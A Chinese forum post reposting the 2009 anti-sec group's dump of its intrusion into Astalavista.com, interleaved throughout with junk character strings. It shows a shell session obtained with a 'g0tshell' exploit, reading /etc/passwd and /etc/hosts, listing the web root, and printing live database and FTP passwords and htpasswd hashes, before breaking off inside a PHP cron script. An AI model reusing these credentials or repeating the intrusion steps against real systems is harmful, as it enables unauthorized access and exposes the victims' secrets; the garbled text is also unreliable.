里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
8 M' d# X( \0 F0 d& j: w2 K, s: N/ n
[root@front3 ~]# curl -I litespeedtech.com3 B1 B( z6 n4 D3 W2 ~
HTTP/1.1 200 OK/ Z* S0 h3 E; C C4 K
Date: Fri, 05 Jun 2009 22:54:51 GMT' Z5 F _1 A% B/ h+ M/ O
Server: LiteSpeed
2 L/ q J. D1 U0 H: e
8 ?3 ?% ] {9 E, k# p4 M7 L) h5 l另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
$ u) f! {! K2 u% T, ?/ P1 t& _9 i2 ^# d9 d5 }" A% Y
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。' n8 o7 R6 Z, p p
( E5 T1 D" n1 ?0 ?
# T5 Z* Z" D+ p0 ~8 ^' L7 n9 A
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ / z. C8 S) r+ D% ]( B
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \8 p8 f. L6 d2 _: H3 b5 @
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
( ~5 Y" `! m! _7 v, \4 n3 W\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /$ Y1 G+ a9 b @& `1 ^/ o
\/ \/ \/ \/ \/ \/ \/
8 @+ q5 |9 {* h( p( k( Q8 k }) s The Hacking & Security Community1 C7 \0 ~+ C7 F/ I7 T. s1 z3 V
[+] Founded in 1997 by a hacker computer enthusiast7 h' k$ L8 z5 G% g5 P ~
[-] Exposed in 2009 by anti-sec group
( T8 ^2 _3 o+ U% F: `
+ _$ j8 o7 e& x) Q' jFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:- {, C! J% w/ R( n$ a5 N
>> 03. Who’s behind the site?
# f# Y' c, Y9 {. h>>/ C8 z* T0 N! O9 M. x, ^$ B! O
>> A team of security and IT professionals, and a countless number of contributors from all over the world." Z J0 [, Y7 [/ J; C
% ^' f- i, @" J, \# d) q; h>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
" \2 h: V5 T0 L1 k, ]5 H5 f>>
: K# Z! ^1 R6 o1 @( @1 j>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
_8 \9 U9 f: F- R+ v( kmilitary institutions.
1 F2 U0 h" H4 {>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information." a. D: E) e# u d. l9 e+ z$ g
, ]- k2 Z" ?2 R1 C( {+ s& C* M
Why has Astalavista been targeted?
1 c; D- x3 O1 ^ \
3 Q# u# Z Z" i7 {Other than the fact that they are not doing any of this for the “community” but3 R2 L b7 }4 z
for the money, they spread exploits for kids, claim to be a security community
. g+ b4 @1 V9 S8 i2 b(with no real sense of security on their own servers), and they charge you $6.66
. _( j' U/ ]& T) ?3 Rper months to access a dead forum with a directory filled with public releases
+ a: e/ R- z' w4 U q$ Iand outdated / broken services.
' ]; b# y; k `5 K6 A. E
# q1 j$ D" K0 q1 TWe wanted to see how good that “team of security and IT professionals” really is.* O- _9 w$ Z# `, {4 t$ R4 L7 b
: H7 m7 @. U% H3 `1 n( {3 k7 n6 j
Let’s begin.' L# P$ O- P7 M4 f* `6 J. y0 O4 P
4 p9 {+ V" \" n% C4 N: x3 K- a
anti-sec:~# ./g0tshell astalavista.com -p 807 c0 \: F# o" u0 q, o
[+] Connecting to astalavista.com:80/ h' I5 O/ E) L3 `# C2 O+ v
[+] Grabbing banner…
* Q) n& w& h1 R O" c, o0 p% SLiteSpeed
" i8 c5 D* y- W S8 J# [: h[+] Injecting shellcode…
; q) N) E1 h; H! U[-] Wait for it
' ^6 v, R w+ r6 T
/ F* d/ N5 |/ o[~] We g0tshell
' [7 c: l" d7 ^, tuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 z+ D: {, R" |: t" S4 i: AID: uid=100(apache) gid=500(apache) groups=500(apache)
0 L; B( O8 V5 j6 x( Z/ Z f
3 h0 X% D) x- jsh-3.2$ cat /etc/passwd" }7 H/ n5 ]* Y+ A
root:x:0:0:root:/root:/bin/bash1 Z5 N n; u! i4 {
bin:x:1:1:bin:/bin:/sbin/nologin0 [+ m8 k8 _6 R
daemon:x:2:2:daemon:/sbin:/sbin/nologin
# p2 L: W% |3 Y' N0 c6 Radm:x:3:4:adm:/var/adm:/sbin/nologin' {4 d2 v% w1 k6 O, h( d
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
4 x% Z9 e6 x. Y Wsync:x:5:0:sync:/sbin:/bin/sync' W+ A. ~6 Z, }) q) P; O+ G
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown1 C9 U% T7 y: n& d3 N- c2 d, w
halt:x:7:0:halt:/sbin:/sbin/halt
; Q$ E" p/ \+ Fmail:x:8:12:mail:/var/spool/mail:/sbin/nologin- G' k6 r* M* ?2 {2 O7 M
news:x:9:13:news:/etc/news:4 ` g% `! V0 \- k$ W+ s
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
; N" P8 ~1 A, W) y3 t3 Poperator:x:11:0 perator:/root:/sbin/nologin5 w- B5 O) o7 |5 G* Y; ^1 @ L
games:x:12:100:games:/usr/games:/sbin/nologin7 h8 z+ Y1 [) }, f
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin- d8 G4 W% |7 H0 ^3 N, a( g; M0 x4 X
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
/ H* {# {$ d6 f9 ? V8 onobody:x:99:99:Nobody:/:/sbin/nologin2 d: E/ \; e, P: Y* b% i
rpm:x:37:37::/var/lib/rpm:/sbin/nologin6 Y3 ^0 t& V B$ G4 F
dbus:x:81:81:System message bus:/:/sbin/nologin
( J" h, I. W" D, E0 b% qnscd:x:28:28:NSCD Daemon:/:/sbin/nologin e8 X7 P* Q& |/ q) v5 `
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin; Y: C& q9 @* {4 Y* E; p
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin) `- l$ w W, P: [. T/ G; g) ]0 c
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin! B; B1 u8 X7 Q0 m4 F y% _
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin# \6 k2 a7 D# L% x8 ?( Z& P
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin7 }8 J& R1 H y; H" a8 r( h: l
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin j( w, q. K2 R; [ V8 z0 a
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin1 v) c; V+ K7 n+ x0 C$ ?
sshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin% I$ C: ` Z4 v/ E# I8 M- @+ K) x- ~
pcap:x:77:77::/var/arpwatch:/sbin/nologin y n" `/ X6 D+ {# a. t2 c
named:x:25:25:Named:/var/named:/sbin/nologin
' I* @- [/ z' h0 Z2 z$ T" g0 Napache:x:100:500::/var/www:/bin/false
5 R C$ i( _: c8 _diradmin:x:101:101::/usr/local/directadmin:/bin/bash
8 [7 F9 K. y3 C* {mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash. ^# M k, s$ X0 s8 S' d# H
webapps:x:500:501::/var/www/html:/bin/bash" Q* i# O. [1 L# T
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash" p) S* |8 `. E6 n& Y
admin:x:501:502::/home/admin:/bin/bash
) @8 { `- V) W# x' Z2 _/ @4 G# njon:x:502:503::/home/jon:/bin/bash
7 Z) q; g) ~3 j1 U. Acom:x:503:504::/home/com:/bin/bash
# C0 L& H/ `' e" k0 A9 A8 K Entp:x:38:38::/etc/ntp:/sbin/nologin9 X+ C; r( @9 G7 a: c/ b I! U
ais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin- m4 |; b2 j0 r* p) j2 j* D3 r
astanet:x:504:505::/home/astanet:/bin/bash/ A, w) H1 e1 H
avahi:x:70:70:Avahi daemon:/:/sbin/nologin3 O; T$ \. c3 l( X6 v, ~" `$ J
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# V9 k' d/ R6 l. q9 N: h
* f) H' D# o2 Z5 Q8 t, }& P" ]: Ksh-3.2$ cat /etc/hosts
4 Z# h3 B- a& H3 H# Do not remove the following line, or various programs
, {! K" P& _! J( t# that require network functionality will fail. ]: A R8 _7 o0 }- e9 d7 I
127.0.0.1 localhost.localdomain localhost I) h# |9 C/ `2 H7 B3 h2 [
::1 localhost6.localdomain6 localhost68 \4 t: z: S' Y6 {8 @9 [% N; v
80.74.154.172 asta1.astalavistaserver.com
2 x; W" m: N6 S8 v
8 w, a* [: N9 ?, P/ @sh-3.2$ pwd8 P; o7 G; q7 x$ M5 O& P
/home/com/public_html
4 h8 r5 t6 |1 w4 Z
8 b& Y8 c# B+ y* {- N9 _( G% V$ msh-3.2$ ls -la$ W. a+ I4 |/ e. S# l9 P2 H& z
total 18460
: _( `4 T( T0 pdrwxr-xr-x 30 com apache 4096 May 28 17:06 .( [' V @7 d; j9 x# J2 C! U
drwx–x–x 11 com com 4096 Jun 25 2008 ..
0 p( [6 Y8 z& ^# j, H0 d6 s, |drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin/ \7 X8 g4 F. `, A; C
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
8 {2 ^* x3 ^3 v ~: H+ z, ~; Cdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin0 f% U: K9 f; U* _
drwxrwxrwx 2 com com 4096 May 19 00:50 config# J6 r; I/ f% d8 L
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core: L6 x7 Q( l4 p3 B f8 p8 j
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
3 G4 S2 G1 {* N) @/ fdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
# ]$ I# Y9 f+ Xdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo8 [; c8 S4 x! ^9 ~1 M7 F8 g
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
4 y2 q/ G4 u9 o3 `. x-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
2 ^4 |# M% m) Sdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd! x; {' F! {) |$ {" N# T7 _9 E
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
4 L) t$ H. t9 b& a6 U- K* a8 ?-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
: W! D& n' r7 M; _drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
$ s S: g. m" j* C! `/ e0 N-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess& K1 d7 n- H1 N7 L0 Q0 p
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak* i2 U% E- F1 v: C' J# l
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak# |: Y+ {2 s& r" A2 b0 s- m
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
% R; @- ^( d9 _- H; Hdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images" X) a! V$ s8 n+ W9 u! i4 f1 E* U
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
7 B. B# P) m( }; e; `4 m1 udrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer+ F' W( J% s$ q6 {; p. X
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
9 p i5 S4 T- q6 A* W( t$ b5 Ydrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib0 x/ H5 u5 H- i8 _1 {4 W7 d
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
( g: A( V" q$ adrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
) |5 U3 E# [ m% R4 M; V8 x' Rdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
+ s3 k1 G* t; Y# V# mdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
+ |- b! Q. ^ w4 h+ Cdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
( X* z \+ r }drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old$ Q6 f& ]# t; a1 K s. C4 z0 h4 V
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
9 R+ ]: }2 [6 b7 H) u" ~ d7 W+ Wdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
* K% |2 A( L5 e( N: W-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
7 ^. ~7 o; \9 ` S6 U-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml+ Y5 F! ]7 ?3 v, m" I# E' ^
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
8 R' B s( f2 e, Qdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes3 Q) I8 W. Y8 m. |- ]" O( K0 S4 Z% M
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp K# a! n, F* ^) ~& r0 G
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam [% K6 A* ~. E$ x8 G4 Q
L$ o6 R, p9 O* {+ `, C0 a: osh-3.2$ head -20 index.php
1 |9 ~" ~% n3 s P/ b7 H<?php" r d/ T1 n9 `$ T& }- K
8 @5 {8 u' u# ^ H* P( X" m
/**) F" j, ^1 F! @, V
* The main page for the CMS$ d9 c9 P4 z' p. V' o
* @copyright CONTREXX CMS - COMVATION AG* @ g9 c/ O* ]/ a3 i8 r/ x
* @author Comvation Development Team7 ~1 p2 |5 E7 q$ ?5 M- L
* @version v1.0.9.10.1 stable
: O0 y. | n( z% x7 h) i! x* @package contrexx r( J$ }1 ?3 W2 D
* @subpackage core
8 v" v6 C) j- T8 V/ b. b* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage f. x; k# z) z4 b5 Z9 v( X- n
* @since v0.0.0.0+ ]% J* U( ?1 I' D0 c) D' y
* @todo Capitalize all class names in project
) h: n9 n P% L- v* @uses /config/configuration.php, [- o/ F& o& f" ^0 @3 w
* @uses /config/settings.php) X2 b, C4 X6 L; W5 u3 |! h0 _6 {
* @uses /config/version.php. F/ V) J( W0 P- \
* @uses /core/API.php
) @( `3 h- F% l: S0 {5 g* @uses /core_modules/cache/index.class.php; v5 H" \% H* j5 w0 \8 O/ l
* @uses /core/error.class.php
" D; M' f* U |/ \* @uses /core_modules/banner/index.class.php' D$ Z h% `# ~ F5 v4 S
* @uses /core_modules/contact/index.class.php4 D K, \: X1 L7 L7 s- {/ F
# R8 c6 ~. f1 X) Y
sh-3.2$ cd config/6 M B; N& D* U2 \2 e1 d: g; l
sh-3.2$ ls -la9 v: k8 O8 I+ D( U
total 32
6 S! p |$ J# g% v- @drwxrwxrwx 2 com com 4096 May 19 00:50 .
5 j( [" T K% ~0 udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ L- A6 S& C+ d-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php# ]5 q) x. ?8 g, x* K+ ^& J: ~
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php. B" [1 J$ \5 u! f/ K
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php0 M' S% D2 A+ n. S9 \8 p
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
9 Y1 m9 l7 ~, S6 m1 I# d0 J
+ k% L4 v& c% y$ q( Zsh-3.2$ cat configuration.php( ]* ~- | s2 t$ x" Z
[snip]
- t. s2 x! i2 G$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost$ ]9 j, W; I+ d7 `
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name% F9 k( Q; @& b q
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix1 M5 {" A. x8 l- l2 d
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username- C8 i% l. T1 M+ p
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
6 ~( ?7 R/ U0 I( W: s* e; N. I$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)7 B) b- h& q0 S& p4 a! ^
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
" e- m1 T6 G0 w6 U[snip]
4 r! w# l$ i: J! l$_FTPCONFIG['is_activated'] = true; // Ftp support true or false9 X( y; a- H* z) u& }) X8 b; z6 G
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
) I7 B6 ^2 |1 h* D( N! [5 D3 ~$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
2 F+ `4 N0 q% {$_FTPCONFIG['port'] = 21; // Ftp remote port8 `; Z. X1 r) e! g2 T
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
' |! f: F' e1 c5 ?$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
x& @3 d1 E- C# j- E$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
$ q2 M" ~ p9 w! W4 _8 ~1 i
, a% N! r/ \2 n4 ysh-3.2$ cd ..
9 K2 w7 J& I4 zsh-3.2$ cd dvd/
1 B$ ]" c) n, E6 ash-3.2$ ls -la) q5 c$ r+ b1 u& I
total 2913780
" V5 ~; I0 C6 F: ^% ^7 pdrwxr-xr-x 2 com com 4096 Sep 9 2008 .: k( |9 U4 H2 U
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
5 \' L, k% y) j6 X3 U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar. s9 P/ A. q! l( S/ ?5 d7 @
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
6 g6 o& h5 D" C8 v" O5 T-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
; b" `( S" ]3 L! q-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
D" h( r. Q% y/ {6 ^. o9 j0 x/ l! O
sh-3.2$ cat .htaccess# `' h- I: v: y$ v3 s& s7 e& t. E
authType Basic
% k3 e) y( D& s/ Z% ]authName DVD# N9 W, L3 K! g" h$ h
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 Y. A: ~: H) h7 Hrequire valid-user
7 S% B- y# i, w! k: b
1 Z+ ?' V1 P9 r$ psh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
q) ^+ i- K0 I# {+ z! u+ O6 nDVDdownload:CRD8cuY6.MPT6- k5 p) b+ \* K9 V/ {+ Q
DVDdownload2:CR8a36.wluFMg
' P, \3 Y: D5 k3 s8 i: h" i% W# |: {/ N! C2 R& R' K
sh-3.2$ cat test.php
3 w& D: h" Y8 K9 z0 E* ?<?php
; [% f) q- J* z2 G/ t' ~$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;3 ^" e1 P5 m6 S, `* i
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));& p6 m( w" [! o" c# p! L v
echo $url;
' M0 j8 m7 v0 ^, V& J! X2 L?>$ }* n% P0 W$ m, n; A+ A5 m. a
1 y" d$ ^$ e9 m, w- f
sh-3.2$ cd modifications/4 r. _' v0 r8 ^# G) c( _. u
sh-3.2$ ls -la; N* D# Z5 U" C5 k' v
total 32
5 @0 Z0 ~ |3 b0 Pdrwxr-xr-x 8 com com 4096 May 11 12:48 .( q( a0 n" N( O$ C. D; }8 M1 F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ../ ^& o* Q6 h {/ J8 X
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng* m j, s5 Y* n5 [/ Z
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
: r, ~' @' C7 |+ _drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools- m% s% m1 p" Z4 R4 W* S6 r( u; }
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
& G4 ^ N( |) x$ e* bdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search, X. t' A, `! {: K$ l( x
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp& F- C% \6 S1 b3 c1 l
4 K ~- p$ A# J( bsh-3.2$ ls -R) ~# E0 y' i, O2 l8 s# J% t
.:" a u( M7 U6 p: Q+ d& k
com_avtng cronjobs onlinetools pjirc search _tmp
* x( R7 s( Q$ [9 [ B0 L* M; @% ?7 w9 q3 }, x- P
./com_avtng:$ E5 j; u; s4 R( l
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
; v2 _7 v6 p! s9 B7 i
6 y: I. c" O# ?; F/ d+ o4 p: w./com_avtng/scripts:/ j; c4 T2 J3 N% g5 N
popunder.js
0 }1 A" o: Q0 ^- i
) D' d$ K% C; O% C. r i2 Z./cronjobs:
. j( P9 N# M7 Z* }. Qexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
3 M0 \, S, J2 G! s4 U! ^2 Z: ^# Q s& R) i8 s7 z$ E7 w
./cronjobs/tmp:
' V; c2 m: Q& @contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv, h/ m* @( S% j/ ^& j% O: w1 G
! @4 R h" \0 W./onlinetools:
9 X! a9 _: M5 J, H8 gindex.php
/ T% L) y' w" y" V( d+ b* k' @3 H* ?: c" ]! m8 s
./pjirc:) j' ^2 n; _7 |3 G/ |7 D4 _2 |1 S# A! c
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& X7 A3 W& X. ]* ], @AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
" A: U9 ]# z4 M# m0 t% a" wbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd( z/ g( t; U+ ]( K8 w H
" Y: @2 C& O. v
./pjirc/img:
- V9 }9 v n4 B2 ^4 Iange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif0 g$ s7 _! E8 u; h
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif # W& v7 s9 z: C: I# I; L
verre-eau.gif
/ N$ h1 E4 u9 `, L! rargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif % @1 h) M5 g3 @
verre-vin.gif
Q" x2 q- S# P4 n) X, ?1 I: S" g# yballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
# {5 t" q8 F2 A/ R* Z- ebiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif- h1 K% n4 E7 @" D! A. u
$ c2 O4 k4 S/ s9 S./pjirc/snd:, {. R n3 O& u: b/ L; l0 q* u
bell2.au ding.au$ V. {9 Y3 k* X3 r- W
- v0 R" Q* p; u( p9 I5 F./search:2 U- A( d( C6 C( H" }5 a
searchEngines.php search.php
3 u0 t6 `3 T; z2 \. E, B/ g8 Y+ P2 N$ C4 x# n! M6 o9 w
./_tmp:
% N1 i% g% p, a6 l3 z' g; s3 CdefaultPorts.php defaultPorts.txt- P; Z+ g$ Z/ j
! I# q, ]3 G5 \; e( l: ]5 C3 p% Zsh-3.2$ cd cronjobs/; ]. E+ D, x$ y( j8 b1 G6 S- V
sh-3.2$ cat exploits.php1 w ^1 a& o4 J9 a8 a, I% L" ^
[snip]! S( P) |, v$ k6 a
$categories = array();
9 [' h, n8 V! B$ {$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;2 O2 h1 N' X# j3 @( a* K+ u+ Y
$expolits = file($milw0rmFile);' w8 ?8 c" p0 w' l
$comExploits = array();
" L6 @3 x+ k6 d: }! P[snip]
- b4 G6 I5 I6 d. A( L% n// manage data
: W' S+ d3 U% Q0 mfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640& |$ Z% y% L4 k% i- W7 N8 v
/ |! v \4 P' |# Z
// get path and title# h% Y, f$ W+ w; O
$expolits[$x] = trim($expolits[$x]);( m' l' J4 G* t2 y5 A( t
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
% C% p) L& J1 [( K $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);, G0 u2 X+ J! `; A1 _- e1 e4 Y
, ^* g* L0 }. ]7 l4 R. A // check if file exists
0 }3 [3 R1 [: u! d _+ t t if (file_exists($path)) {
8 c" ^: M: Q( q; y8 X& P
5 q7 D: i. S+ a" d) p $text = file_get_contents($path);
- _6 O. r8 n4 B" c S3 v7 m" T- [( O0 t
// get content and date
, s% ?) E9 M# H, @ //$text = htmlspecialchars($text, ENT_QUOTES);
$ O4 g0 T k: _& o( t; j$ J $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));; D h' s9 c6 s' f
if ($tmptext != ”) {
% y6 h/ y& O+ U0 X $text = $tmptext;
. q2 }4 @' V; w% X, y6 E. b$ Z8 r } else {
7 P3 Y0 c, q) k: J( S$ ?# |, q6 Y+ {) D $text = addslashes(htmlentities($text, ENT_QUOTES));- i) h# _1 A2 W2 i% o+ G% K" ?$ ~
}" \2 q- A5 ~2 o; @: h
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
8 X4 N: t. J& G N8 o9 R! Q; f" x( ~ $tmp = explode('-', $date);* @" t) o9 `+ R1 g
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
& b% j6 y. q& J" U0 v6 @ $cat = getCategory ($path);
' c f! m2 Q8 g2 r6 E( E $ext = pathinfo(basename($path));
' A% f8 S# E3 A# H& L( Q. J } $ext = $ext['extension'];% | b. f4 b8 W
$qStr = ”
$ A J/ v( {" {' I; d SELECT `id`
( y/ |7 c* `' @3 P$ M7 c FROM `contrexx_module_exploits`
" a# R( A i( ]* W+ {# {" W WHERE `title` = ‘” . $title . “‘& |" D4 o* ?& L# J1 O1 T$ K
AND `date` = ‘” . $date . “‘* W0 l! b! G* F
“;
6 t7 b& |0 r2 J1 v L# X$ }; G echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;' @: p- v- W7 h6 ~
$q = $_objDB->query($qStr);% l: b1 d& D1 H
" l& M& J$ h8 [) u+ e: Q3 w2 x! R
if ($q->numRows() == 0) {1 d/ X: P, w. S" [5 ] }7 A9 Q% ~
, n& E0 W7 j% i% a! @" p
// prepare array7 @2 _( G& E: g7 H
$comExploits[$x]['date'] = $date;0 b2 R2 h' Q2 Y% S* F+ J) Y
$comExploits[$x]['title'] = $title;. M2 ~ T+ w& ?) B3 j0 z- d( N
$comExploits[$x]['author'] = ‘milw0rm’;
3 |( ]+ T8 z2 j& {3 { $comExploits[$x]['text'] = $text;
8 P; |6 F. C8 ]: }8 Z3 d $comExploits[$x]['source'] = $ext;
" C, X* L5 l q/ r% J $comExploits[$x]['url1'] = ”;+ E4 g+ h5 s2 i- v3 C$ R0 B( ^
$comExploits[$x]['url2'] = ”;
% o. s$ w- p" \ _ $comExploits[$x]['catid'] = $cat;
; k4 J5 | u) |8 e $comExploits[$x]['lang'] = ‘2′;7 }7 S D6 K+ l- u
$comExploits[$x]['userid'] = ‘12′;: k- k) |9 Q3 W: s% \+ p9 `
$comExploits[$x]['startdate'] = ‘0000-00-00′;
, X$ ?! O: I3 u7 K2 w $comExploits[$x]['enddate'] = ‘0000-00-00′;
8 ^9 J7 i/ h9 o3 W$ b1 \* {. ~ $comExploits[$x]['status'] = ‘1′;
% |: X' i# O3 e5 [, o2 V3 u$ C2 y $comExploits[$x]['changelog'] = $date;: {/ m3 M3 _0 x9 e: U
], ~9 x+ F$ Y9 x; ]0 ?2 Q
}8 r+ l6 ?2 ?3 K7 ?2 X! y
[snip]1 s" P4 w* V( |4 {* M9 h6 x
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?> k8 b. T5 R, g w
<rss version=”2.0″>
9 T, x5 V& R; ], W+ R, Z" ~ <channel>" ]/ N+ e$ r3 R6 F9 d2 L) ~5 l
<title>ASTALAVISTA.com - Exploits</title>
